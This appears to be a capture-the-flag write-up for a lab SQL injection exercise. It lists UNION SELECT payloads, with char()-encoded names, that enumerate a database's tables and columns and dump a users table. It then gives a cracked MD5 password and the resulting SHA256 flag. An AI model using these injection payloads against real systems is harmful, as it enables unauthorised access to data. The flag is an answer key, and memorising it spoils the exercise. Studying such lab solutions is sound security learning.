get database DATABASE_NAME
    UNION SELECT 1, database()
get TABEL_NAME
    UNION SELECT 1, TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA = char(77,101,109,98,101,114,95,83,113,108,95,73,110,106,101,99,116,105,111,110)
get COLUMN_NAME
    UNION SELECT 1, COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = char(77,101,109,98,101,114,95,83,113,108,95,73,110,106,101,99,116,105,111,110) AND TABLE_NAME = char(117,115,101,114,115)

TABLE COLUMNS 
    * user_id
    * first_name
    * last_name
    * town
    * country 
    * planet
    * Commentaire
    * countersign

    we can foud at id 5  l
    ast_name = "GetThe", 
    first_name = 'falg' ,
    town = '42', 
    country = '42', 
    planet = '42', 
    Commentaire= "Decrypt this password -> then lower all the char. Sh256 on it and it's good !",
    countersign = '5ff9d0165b4f92b14994e5c685cdce28'


    after Decrypt the hash with md5 we get ===> 'FortyTwo' 
    and Crypt it with Sha256 we get the flag ===> '9995cae900a927ab1500d317dfcc52c0ad8a521bea878a8e9fa381b41459b646'
